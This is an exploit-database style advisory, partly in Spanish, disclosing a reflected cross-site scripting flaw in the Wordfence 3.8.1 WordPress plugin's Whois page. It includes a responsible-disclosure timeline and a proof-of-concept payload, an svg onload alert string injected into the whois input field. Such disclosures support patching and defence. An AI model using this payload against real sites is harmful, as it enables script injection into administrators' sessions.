# Exploit Title: Wordpress Plugin Wordfence 3.8.1 - Cross Site Scripting
# Date: 28 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://www.wordfence.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 3.8.1 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev, SeguridadBlanca (Dedalo)
http://seguridadblanca.in/
###########################################################################################

Timeline:
- 21 De agosto XSS Encontrado y Reportado.
- 27 de Agosto Reponden y Confirman Vulnerabilidad
- 28 De Agosto Publican Parche de Vulnerabilidad.
- 28 de Agosto Divulgacion y Hago publica la vulnerabilidad.
Changelog: http://wordpress.org/plugins/wordfence/changelog/

###########################################################################################

Affected items - Archivos Afectados.

http://localhost/wordpress/wp-admin/admin.php?page=WordfenceWhois

Prueba de Concepto PoC:
Vector: "><svg/onload=alert(/Dylan/)>

Input: <input id="wfwhois" type="text" onkeydown="if(event.keyCode == 13){
WFAD.whois(jQuery('#wfwhois').val()); }"

maxlength="255" size="40" value="" name="whois">

###########################################################################################

-- 
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
WhiteHat.
*